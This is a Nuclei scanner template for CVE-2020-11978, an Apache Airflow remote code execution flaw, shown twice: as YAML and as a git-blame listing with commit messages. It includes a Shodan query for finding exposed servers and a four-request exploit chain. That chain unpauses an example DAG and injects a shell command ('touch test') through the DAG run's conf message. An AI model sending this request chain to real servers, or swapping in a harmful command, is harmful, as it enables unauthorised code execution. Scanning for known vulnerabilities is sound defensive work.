nuclei-templates/http/cves/2020/CVE-2020-11978.yaml

id: CVE-2020-11978

info:
  name: Apache Airflow <=1.10.10 - Remote Code Execution
  author: pdteam
  severity: high
  description: Apache Airflow versions 1.10.10 and below are vulnerable to remote code/command injection vulnerabilities in one of the example DAGs shipped with Airflow. This could allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use).
  remediation: If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
  reference:
    - https://github.com/pberba/CVE-2020-11978
    - https://twitter.com/wugeej/status/1400336603604668418
    - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
    - http://packetstormsecurity.com/files/174764/Apache-Airflow-1.10.10-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2020-11978
    cwe-id: CWE-78
    epss-score: 0.97201
    epss-percentile: 0.99758
    cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: apache
    product: airflow
    shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs"
  tags: packetstorm,cve,cve2020,apache,airflow,rce,kev

http:
  - raw:
      - |
        GET /api/experimental/test HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json

        {"conf": {"message": "\"; touch test #"}}
      - |
        GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    req-condition: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_4, "operator":"BashOperator")'
          - 'contains(header_4, "application/json")'
        condition: and

    extractors:
      - type: regex
        name: exec_date
        group: 1
        regex:
          - '"execution_date":"([0-9-A-Z:+]+)"'
        internal: true
        part: body

# digest: 4a0a00473045022100befb475be6f901acfd126e47cdc157fa2567c295663bd5960b1c506c780c64ed02205f4effbd416335109bd85431d2db99cd01aac24f6204e82d2a0f5c8a16667810:922c64590222798bb761d5b6d8e72950
Added CVE-2020-11978 2021-06-03 08:27:09 +00:00			`id: CVE-2020-11978`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00
Added CVE-2020-11978 2021-06-03 08:27:09 +00:00			`info:`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`name: Apache Airflow <=1.10.10 - Remote Code Execution`
Added CVE-2020-11978 2021-06-03 08:27:09 +00:00			`author: pdteam`
			`severity: high`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`description: Apache Airflow versions 1.10.10 and below are vulnerable to remote code/command injection vulnerabilities in one of the example DAGs shipped with Airflow. This could allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use).`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`remediation: If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- https://github.com/pberba/CVE-2020-11978`
			`- https://twitter.com/wugeej/status/1400336603604668418`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2020-11978`
templateman update 2023-10-14 11:27:55 +00:00			`- http://packetstormsecurity.com/files/174764/Apache-Airflow-1.10.10-Remote-Code-Execution.html`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 8.8`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2020-11978`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`cwe-id: CWE-78`
TemplateMan Update [Wed Oct 18 16:26:29 UTC 2023] :robot: 2023-10-18 16:26:30 +00:00			`epss-score: 0.97201`
TemplateMan Update [Fri Nov 3 15:51:18 UTC 2023] :robot: 2023-11-03 15:51:18 +00:00			`epss-percentile: 0.99758`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`cpe: cpe:2.3:a:apache:airflow::::::::`
Update metadata query (#4350) * Update adobe-component-login.yaml * Update cold-fusion-cfcache-map.yaml * Update unpatched-coldfusion.yaml * Update coldfusion-debug-xss.yaml * Update CVE-2020-11978.yaml * Update CVE-2020-13927.yaml * Update CVE-2021-38540.yaml * Update CVE-2021-44451.yaml * Update CVE-2022-24288.yaml * Update airflow-debug.yaml * Update airflow-detect.yaml * Update CVE-2010-0219.yaml * Update apache-axis-detect.yaml * Update CVE-2020-11991.yaml * Update apache-cocoon-detect.yaml * Update CVE-2021-21402.yaml * Update jellyfin-detect.yaml * Update CVE-2021-21402.yaml * Update CVE-2021-21402.yaml * Update ecology-arbitrary-file-upload.yaml * Update ecology-v8-sqli.yaml * Update ecology-syncuserinfo-sqli.yaml * Update ecology-filedownload-directory-traversal.yaml * Update CNVD-2021-15822.yaml * Update dedecms-carbuyaction-fileinclude.yaml * Update dedecms-openredirect.yaml * Update tamronos-rce.yaml * Update natshell-path-traversal.yaml 2022-05-12 14:18:36 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`max-request: 4`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: apache`
			`product: airflow`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`shodan-query: http.html:"Apache Airflow" \|\| title:"Airflow - DAGs"`
TemplateMan Update [Sat Oct 14 19:50:16 UTC 2023] :robot: 2023-10-14 19:50:16 +00:00			`tags: packetstorm,cve,cve2020,apache,airflow,rce,kev`
Added CVE-2020-11978 2021-06-03 08:27:09 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added CVE-2020-11978 2021-06-03 08:27:09 +00:00			`- raw:`
			`- \|`
			`GET /api/experimental/test HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`- \|`
			`GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`- \|`
			`POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Content-Type: application/json`

			`{"conf": {"message": "\"; touch test #"}}`
			`- \|`
			`GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`

			`req-condition: true`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
Added CVE-2020-11978 2021-06-03 08:27:09 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'contains(body_4, "operator":"BashOperator")'`
removed deprecated header syntax with latest one 2023-06-19 21:10:30 +00:00			`- 'contains(header_4, "application/json")'`
Merge branch 'Update-metadata-query' of https://github.com/ritikchaddha/nuclei-templates into ritikchaddha-Update-metadata-query 2022-06-16 04:33:41 +00:00			`condition: and`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
			`extractors:`
			`- type: regex`
			`name: exec_date`
			`group: 1`
			`regex:`
			`- '"execution_date":"([0-9-A-Z:+]+)"'`
			`internal: true`
			`part: body`
TemplateMan Update [Sun Nov 5 22:23:39 UTC 2023] :robot: 2023-11-05 22:23:39 +00:00
			`# digest: 4a0a00473045022100befb475be6f901acfd126e47cdc157fa2567c295663bd5960b1c506c780c64ed02205f4effbd416335109bd85431d2db99cd01aac24f6204e82d2a0f5c8a16667810:922c64590222798bb761d5b6d8e72950`